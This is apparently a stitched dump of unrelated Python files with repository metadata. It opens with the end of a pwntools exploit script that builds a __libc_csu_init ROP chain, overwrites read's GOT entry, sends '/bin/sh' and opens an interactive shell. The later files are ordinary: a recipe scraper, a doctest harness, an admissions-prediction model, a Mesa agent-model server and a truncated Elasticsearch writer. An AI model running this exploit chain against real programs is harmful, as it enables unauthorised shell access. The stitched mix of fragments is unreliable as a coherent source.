e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x00\x00\x00\x00\x00\x00\x00\x00\x96\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x48\x0e\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x80\x08\x40\x00\x00\x00\x00\x00\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xe0\x05\x40\x00\x00\x00\x00\x00\x68\x06\x40\x00\x00\x00\x00\x00\x60\x18\x60\x00\x00\x00\x00\x00\x4a\x07\x40\x00\x00\x00\x00\x00\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e
\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e'
proc.send(payload)
time.sleep(0.2)
proc.recvrepeat(0)
payload = p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.got['read'])
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x1)
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(0x0)
payload += p64(target_base + target.bss())
payload += p64(0x3b)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
payload += p64(target_base + __libc_csu_init_gadget1)
payload += p64(0x4141414141414141)
payload += p64(0x0)
payload += p64(0x1)
payload += p64(target_base + __libc_csu_init_call_target)
payload += p64(target_base + target.bss())
payload += p64(0x0)
payload += p64(0x0)
payload += p64(target_base + __libc_csu_init_gadget2)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(0x4141414141414141)
payload += p64(target_base + target.sym['read'])
proc.send(payload)
time.sleep(0.2)
payload = b'\x0e'
proc.send(payload)
time.sleep(0.2)
payload = b'\x2f\x62\x69\x6e\x2f\x73\x68\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
proc.send(payload)
time.sleep(0.2)
proc.interactive()
| 0 | 0 | 0 |
4f46a39ae434d903a111c5c0903dc93e04f76bf6 | 2,447 | py | Python | recipe_parser/recipes/allrecipes.py | tyler-a-cox/recipe-parsing | fa883f66a39063cf72912527628b082cda455e76 | [
"MIT"
] | null | null | null | recipe_parser/recipes/allrecipes.py | tyler-a-cox/recipe-parsing | fa883f66a39063cf72912527628b082cda455e76 | [
"MIT"
] | null | null | null | recipe_parser/recipes/allrecipes.py | tyler-a-cox/recipe-parsing | fa883f66a39063cf72912527628b082cda455e76 | [
"MIT"
] | null | null | null | import inspect
from bs4 import BeautifulSoup
from typing import Optional, Union
from ._settings import HEADERS
from ._schema import DefaultSchema
from ._utils import clean_vulgar_fraction, clean_unicode
class AllRecipes(DefaultSchema):
    """Scraper schema for recipes hosted on allrecipes.com."""

    @classmethod
    def host(cls):
        # Restored: the stray @classmethod that sat above __init__ belonged to
        # this method. Without it, __init__ itself was turned into a
        # classmethod and instantiation broke.
        return "allrecipes.com"

    def __init__(self, url: str, headers: Optional[dict] = HEADERS):
        """Fetch ``url`` (via DefaultSchema) and parse the page with BeautifulSoup.

        url : str
            Recipe page URL to scrape.
        headers : dict, Optional
            HTTP request headers (defaults to module-level HEADERS).
        """
        super().__init__(url)
        self.soup = BeautifulSoup(self.page, "html.parser")

    def title(self):
        """Recipe title, taken from the ``og:title`` meta tag."""
        return self.soup.find("meta", {"property": "og:title"}).get("content")

    def description(self):
        """Recipe description, taken from the ``og:description`` meta tag."""
        return self.soup.find("meta", {"property": "og:description"}).get("content")

    def instructions(self):
        """List of instruction-step strings from the instructions section."""
        tags = self.soup.find("ul", {"class": "instructions-section"}).find_all("p")
        return [tag.get_text() for tag in tags]

    def author(self):
        """Author display name."""
        return self.soup.find("span", {"class": "author-name authorName"}).get_text()

    def ratings(self):
        """Aggregate rating, taken from the ``og:rating`` meta tag."""
        return self.soup.find("meta", {"name": "og:rating"}).get("content")

    def yields(self):
        """Recipe yield — not implemented for this site."""
        pass

    def time(self) -> float:
        """Total cooking time — not implemented for this site."""
        pass

    def category(self) -> list:
        """Single-element list holding the last breadcrumb (the category)."""
        return [
            self.soup.find("a", {"class": "breadcrumbs__link--last"})
            .find("span")
            .get_text()
        ]

    def nutrition(self) -> dict:
        """Parse the nutrition section into {nutrient: amount}.

        'Calories' is parsed as a float; other nutrients keep their raw
        amount strings (e.g. '10g').
        """
        nutrition = {}
        text = (
            self.soup.find("div", {"class": "recipe-nutrition-section"})
            .find("div", {"class": "section-body"})
            .get_text()
            .strip()
        )
        if text.endswith("Full Nutrition"):
            text = text.replace(". Full Nutrition", "")
        text = text.split(";")
        nutrition["Calories"] = float(text[0].split(" ")[0])
        for t in text[1:]:
            nutrient, amount = t.strip().split(" ")
            nutrition[nutrient] = amount
        return nutrition

    def ingredients(self) -> list:
        """List of ingredient-name strings, unicode-cleaned."""
        tags = self.soup.find_all("span", {"class": "ingredients-item-name"})
        return [clean_unicode(tag.get_text()) for tag in tags]
| 24.47 | 85 | 0.509195 | import inspect
from bs4 import BeautifulSoup
from typing import Optional, Union
from ._settings import HEADERS
from ._schema import DefaultSchema
from ._utils import clean_vulgar_fraction, clean_unicode
class AllRecipes(DefaultSchema):
    """Scraper schema for recipes hosted on allrecipes.com."""
    @classmethod
    def host(cls):
        """Domain this scraper handles."""
        return "allrecipes.com"
    def __init__(self, url: str, headers: Optional[dict] = HEADERS):
        """Fetch the page (via DefaultSchema) and parse it with BeautifulSoup.

        url : str
            Recipe page URL to scrape.
        headers : dict, Optional
            HTTP request headers (defaults to module-level HEADERS).
        """
        super().__init__(url)
        self.soup = BeautifulSoup(self.page, "html.parser")
    def title(self):
        """Recipe title, taken from the ``og:title`` meta tag."""
        return self.soup.find("meta", {"property": "og:title"}).get("content")
    def description(self):
        """Recipe description, taken from the ``og:description`` meta tag."""
        return self.soup.find("meta", {"property": "og:description"}).get("content")
    def instructions(self):
        """List of instruction-step strings from the instructions section."""
        tags = self.soup.find("ul", {"class": "instructions-section"}).find_all("p")
        return [tag.get_text() for tag in tags]
    def author(self):
        """Author display name."""
        return self.soup.find("span", {"class": "author-name authorName"}).get_text()
    def ratings(self):
        """Aggregate rating, taken from the ``og:rating`` meta tag."""
        return self.soup.find("meta", {"name": "og:rating"}).get("content")
    def yields(self):
        """Recipe yield — not implemented for this site."""
        pass
    def time(self) -> float:
        """Total cooking time — not implemented for this site."""
        pass
    def category(self) -> list:
        """Single-element list holding the last breadcrumb (the category)."""
        return [
            self.soup.find("a", {"class": "breadcrumbs__link--last"})
            .find("span")
            .get_text()
        ]
    def nutrition(self) -> dict:
        """Parse the nutrition section into {nutrient: amount}; 'Calories' is a float."""
        nutrition = {}
        text = (
            self.soup.find("div", {"class": "recipe-nutrition-section"})
            .find("div", {"class": "section-body"})
            .get_text()
            .strip()
        )
        if text.endswith("Full Nutrition"):
            text = text.replace(". Full Nutrition", "")
        text = text.split(";")
        nutrition["Calories"] = float(text[0].split(" ")[0])
        for t in text[1:]:
            nutrient, amount = t.strip().split(" ")
            nutrition[nutrient] = amount
        return nutrition
    def ingredients(self) -> list:
        """List of ingredient-name strings, unicode-cleaned."""
        tags = self.soup.find_all("span", {"class": "ingredients-item-name"})
        return [clean_unicode(tag.get_text()) for tag in tags]
| 25 | 0 | 26 |
802a3bd1834812a7a38a6c8b32a5bf8db0b48403 | 879 | py | Python | tests/test_docs.py | regebro/passwordmetrics | 47f5c6eaad3b3f503094fdb456befa8bcb8a1b19 | [
"MIT"
] | 6 | 2015-04-29T17:07:55.000Z | 2021-08-06T14:28:20.000Z | tests/test_docs.py | regebro/passwordmetrics | 47f5c6eaad3b3f503094fdb456befa8bcb8a1b19 | [
"MIT"
] | null | null | null | tests/test_docs.py | regebro/passwordmetrics | 47f5c6eaad3b3f503094fdb456befa8bcb8a1b19 | [
"MIT"
] | 1 | 2017-12-23T06:36:26.000Z | 2017-12-23T06:36:26.000Z | import sys
import re
import doctest
import manuel.doctest
import manuel.codeblock
import manuel.testing
import unittest
if sys.version_info[0] < 3:
# Just don't do them under Python 3.
# Sigh.
if __name__ == '__main__':
unittest.TextTestRunner().run(additional_tests())
| 30.310345 | 83 | 0.613197 | import sys
import re
import doctest
import manuel.doctest
import manuel.codeblock
import manuel.testing
import unittest
if sys.version_info[0] < 3:
    # Just don't do them under Python 3.
    # Sigh.
    class CustomChecker(doctest.OutputChecker):
        """Rewrites Python-2 ``set([...])`` reprs into set-literal syntax."""
        def check_output(self, want, got, optionflags):
            # Normalise set reprs in captured output before the base-class compare.
            got = re.sub("set\(\[([^\]]+?)\]\)", "{\\1}", got)
            got = re.sub("set\(\[]\)", "set()", got)
            return doctest.OutputChecker.check_output(self, want, got, optionflags)
    def additional_tests():
        # Build the manuel suite for docs/usage.rst (Python 2 only).
        m = manuel.doctest.Manuel(optionflags=doctest.NORMALIZE_WHITESPACE,
                                  checker=CustomChecker())
        m += manuel.codeblock.Manuel()
        return manuel.testing.TestSuite(m, r'../docs/usage.rst')
if __name__ == '__main__':
    # NOTE(review): on Python 3, additional_tests is never defined (the guard
    # above skips it), so running this as a script raises NameError — confirm
    # whether the script is py2-only or should guard this call too.
    unittest.TextTestRunner().run(additional_tests())
| 483 | 22 | 89 |
71336ba4933f2a37f7f3b0fdded458adb63b6c1d | 1,238 | py | Python | final_flask/run_ml.py | madbee99/Final_Project | 154edb302b6b4494b277e732f72efd1163589c3e | [
"MIT"
] | null | null | null | final_flask/run_ml.py | madbee99/Final_Project | 154edb302b6b4494b277e732f72efd1163589c3e | [
"MIT"
] | null | null | null | final_flask/run_ml.py | madbee99/Final_Project | 154edb302b6b4494b277e732f72efd1163589c3e | [
"MIT"
] | null | null | null | import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import psycopg2
from sqlalchemy import create_engine
from config import db_password
#data from: https://www.kaggle.com/malapatiravi/graduate-school-admission-data/home
| 34.388889 | 95 | 0.753635 | import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
import psycopg2
from sqlalchemy import create_engine
from config import db_password
#data from: https://www.kaggle.com/malapatiravi/graduate-school-admission-data/home
def predictions(gre, gpa, undergrad_school_rank):
    """Train a logistic-regression admission model and predict for one applicant.

    Reads the CLEAN_MODEL_DATA table from the local Postgres database,
    fits a standardized logistic regression on ['gre', 'gpa', 'rank']
    against 'admit', and returns the predicted class for the applicant.

    :param gre: applicant's GRE score
    :param gpa: applicant's GPA
    :param undergrad_school_rank: rank of the applicant's undergrad school
    :return: length-1 array containing the predicted 'admit' class
    """
    db_string = f"postgresql://postgres:{db_password}@localhost:5432/Final_Project"
    engine = create_engine(db_string)
    model_df = pd.read_sql('''SELECT * FROM CLEAN_MODEL_DATA''', con=engine)
    X = model_df[['gre', 'gpa', 'rank']]
    y = model_df['admit']
    X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, random_state=1)
    scaler = StandardScaler().fit(X_train)
    X_train_scaled = scaler.transform(X_train)
    X_test_scaled = scaler.transform(X_test)
    classifier = LogisticRegression(class_weight='balanced')
    classifier.fit(X_train_scaled, y_train)
    print(f"Training Data Score: {classifier.score(X_train_scaled, y_train)}")
    print(f"Testing Data Score: {classifier.score(X_test_scaled, y_test)}")
    # BUG FIX: the model was fit on standardized features, so the applicant's
    # features must go through the same scaler before predicting; the original
    # predicted on raw values.
    return classifier.predict(scaler.transform([[gre, gpa, undergrad_school_rank]]))
| 865 | 0 | 23 |
289c138c6b453a9bc534345857c55549ca620b34 | 2,781 | py | Python | Code/other/my-epstein/civil_violence/server.py | joekroese/math-of-revolution | c831ea3d5f6c56c3861522f71ec47e1a22f9ff2c | [
"MIT"
] | 2 | 2019-12-07T18:16:46.000Z | 2020-06-16T10:54:20.000Z | Code/other/my-epstein/civil_violence/server.py | joekroese/math-of-revolution | c831ea3d5f6c56c3861522f71ec47e1a22f9ff2c | [
"MIT"
] | null | null | null | Code/other/my-epstein/civil_violence/server.py | joekroese/math-of-revolution | c831ea3d5f6c56c3861522f71ec47e1a22f9ff2c | [
"MIT"
] | null | null | null | from mesa.visualization.ModularVisualization import ModularServer
from mesa.visualization.modules import CanvasGrid
from mesa.visualization.UserParam import UserSettableParameter
from mesa.visualization.modules import ChartModule
from .model import CivilViolenceModel
from .agent import Citizen, Cop
# Colors used when drawing agents on the grid.
COP_COLOR = "Black"
AGENT_QUIET_COLOR = "Blue"
AGENT_REBEL_COLOR = "Red"
JAIL_COLOR = "Grey"


def citizen_cop_portrayal(agent):
    """Return the CanvasGrid portrayal dict for an agent (None -> draw nothing).

    Restored: ``canvas_element`` below references this function, which was
    missing from this copy of the module (NameError at import time).
    """
    if agent is None:
        return
    portrayal = {"Shape": "circle",
                 "x": agent.pos[0], "y": agent.pos[1],
                 "Filled": "true"}
    if type(agent) is Citizen:
        # Jailed citizens override the quiescent/rebel coloring.
        color = AGENT_QUIET_COLOR if agent.condition == "Quiescent" else \
            AGENT_REBEL_COLOR
        color = JAIL_COLOR if agent.jail_sentence else color
        portrayal["Color"] = color
        portrayal["r"] = 0.8
        portrayal["Layer"] = 0
    elif type(agent) is Cop:
        portrayal["Color"] = COP_COLOR
        portrayal["r"] = 0.5
        portrayal["Layer"] = 1
    return portrayal


# Grid dimensions (fixed; equal height and width).
height = 70
width = 70

# Model parameters exposed in the browser UI.
model_params = {
    'height': height,
    'width': width,
    'citizen_density': UserSettableParameter('slider', 'Citizen Density', 0.7, 0.0, 1, 0.01,
                                             description='Citizen Density'),
    'cop_density': UserSettableParameter('slider', 'Cop Density', 0.1, 0.0, 1, 0.01,
                                         description='Cop Density'),
    'citizen_vision': UserSettableParameter('slider', 'Citizen Vision', 7, 0, 20, 1,
                                            description='Citizen vision'),
    'cop_vision': UserSettableParameter('slider', 'Cop Vision', 7, 0, 20, 1,
                                        description='Cop Vision'),
    'legitimacy': UserSettableParameter('slider', 'Legitimacy', 0.8, 0.0, 1.0, 0.01,
                                        description='Legitimacy'),
    'max_jail_term': UserSettableParameter('slider', 'Max Jail Term', 1000, 0, 10000, 1,
                                           description='Max Jail Term')
}

# Line chart tracking the number of actively rebelling citizens.
chart = ChartModule([{"Label": "Active",
                      "Color": "Red"}],
                    data_collector_name='datacollector')

# BUG FIX: CanvasGrid takes (portrayal, grid_width, grid_height, px_w, px_h);
# the original passed 'height' twice (harmless only while width == height).
canvas_element = CanvasGrid(citizen_cop_portrayal, model_params['width'],
                            model_params['height'], 700, 700)

server = ModularServer(CivilViolenceModel, [canvas_element, chart],
                       "Epstein Civil Violence", model_params)
| 40.304348 | 108 | 0.57749 | from mesa.visualization.ModularVisualization import ModularServer
from mesa.visualization.modules import CanvasGrid
from mesa.visualization.UserParam import UserSettableParameter
from mesa.visualization.modules import ChartModule
from .model import CivilViolenceModel
from .agent import Citizen, Cop
COP_COLOR = "Black"
AGENT_QUIET_COLOR = "Blue"
AGENT_REBEL_COLOR = "Red"
JAIL_COLOR = "Grey"
def citizen_cop_portrayal(agent):
    """Build the CanvasGrid portrayal dict for an agent.

    Returns None for an empty cell; otherwise a circle whose color, radius,
    and layer depend on whether the agent is a Citizen (quiet / rebel /
    jailed) or a Cop.
    """
    if agent is None:
        return
    portrayal = {
        "Shape": "circle",
        "x": agent.pos[0],
        "y": agent.pos[1],
        "Filled": "true",
    }
    if type(agent) is Citizen:
        # Jail status takes precedence over the quiet/rebel distinction.
        if agent.jail_sentence:
            fill = JAIL_COLOR
        elif agent.condition == "Quiescent":
            fill = AGENT_QUIET_COLOR
        else:
            fill = AGENT_REBEL_COLOR
        portrayal.update({"Color": fill, "r": 0.8, "Layer": 0})
    elif type(agent) is Cop:
        portrayal.update({"Color": COP_COLOR, "r": 0.5, "Layer": 1})
    return portrayal
# Grid dimensions (fixed; equal height and width).
height = 70
width = 70

# Model parameters exposed in the browser UI.
model_params = {
    'height': height,
    'width': width,
    'citizen_density': UserSettableParameter('slider', 'Citizen Density', 0.7, 0.0, 1, 0.01,
                                             description='Citizen Density'),
    'cop_density': UserSettableParameter('slider', 'Cop Density', 0.1, 0.0, 1, 0.01,
                                         description='Cop Density'),
    'citizen_vision': UserSettableParameter('slider', 'Citizen Vision', 7, 0, 20, 1,
                                            description='Citizen vision'),
    'cop_vision': UserSettableParameter('slider', 'Cop Vision', 7, 0, 20, 1,
                                        description='Cop Vision'),
    'legitimacy': UserSettableParameter('slider', 'Legitimacy', 0.8, 0.0, 1.0, 0.01,
                                        description='Legitimacy'),
    'max_jail_term': UserSettableParameter('slider', 'Max Jail Term', 1000, 0, 10000, 1,
                                           description='Max Jail Term')
}

# Line chart tracking the number of actively rebelling citizens.
chart = ChartModule([{"Label": "Active",
                      "Color": "Red"}],
                    data_collector_name='datacollector')

# BUG FIX: CanvasGrid takes (portrayal, grid_width, grid_height, px_w, px_h);
# the original passed 'height' twice (harmless only while width == height).
canvas_element = CanvasGrid(citizen_cop_portrayal, model_params['width'],
                            model_params['height'], 700, 700)

server = ModularServer(CivilViolenceModel, [canvas_element, chart],
                       "Epstein Civil Violence", model_params)
| 619 | 0 | 23 |
bb57351e558e0a9c4d003f9fbfa6974828e96c87 | 4,874 | py | Python | tube/etl/outputs/es/writer.py | plooploops/tube | 4ca697b7714b057c78fdb80f88edba37e837262e | [
"Apache-2.0"
] | null | null | null | tube/etl/outputs/es/writer.py | plooploops/tube | 4ca697b7714b057c78fdb80f88edba37e837262e | [
"Apache-2.0"
] | 2 | 2021-03-24T16:04:22.000Z | 2021-03-30T12:54:07.000Z | tube/etl/outputs/es/writer.py | plooploops/tube | 4ca697b7714b057c78fdb80f88edba37e837262e | [
"Apache-2.0"
] | null | null | null | import json
from elasticsearch import Elasticsearch
from tube.etl.outputs.es.timestamp import (
putting_timestamp,
get_latest_utc_transaction_time,
)
from tube.etl.outputs.es.versioning import Versioning
from tube.etl.plugins import post_process_plugins, add_auth_resource_path_mapping
from tube.etl.spark_base import SparkBase
from tube.utils.general import get_node_id_name
| 34.814286 | 86 | 0.598277 | import json
from elasticsearch import Elasticsearch
from tube.etl.outputs.es.timestamp import (
putting_timestamp,
get_latest_utc_transaction_time,
)
from tube.etl.outputs.es.versioning import Versioning
from tube.etl.plugins import post_process_plugins, add_auth_resource_path_mapping
from tube.etl.spark_base import SparkBase
from tube.utils.general import get_node_id_name
def json_export(x, doc_type):
    """Turn an (id, doc) pair into (id, json_string).

    Stamps the doc-type-specific id field and the legacy ``node_id`` field
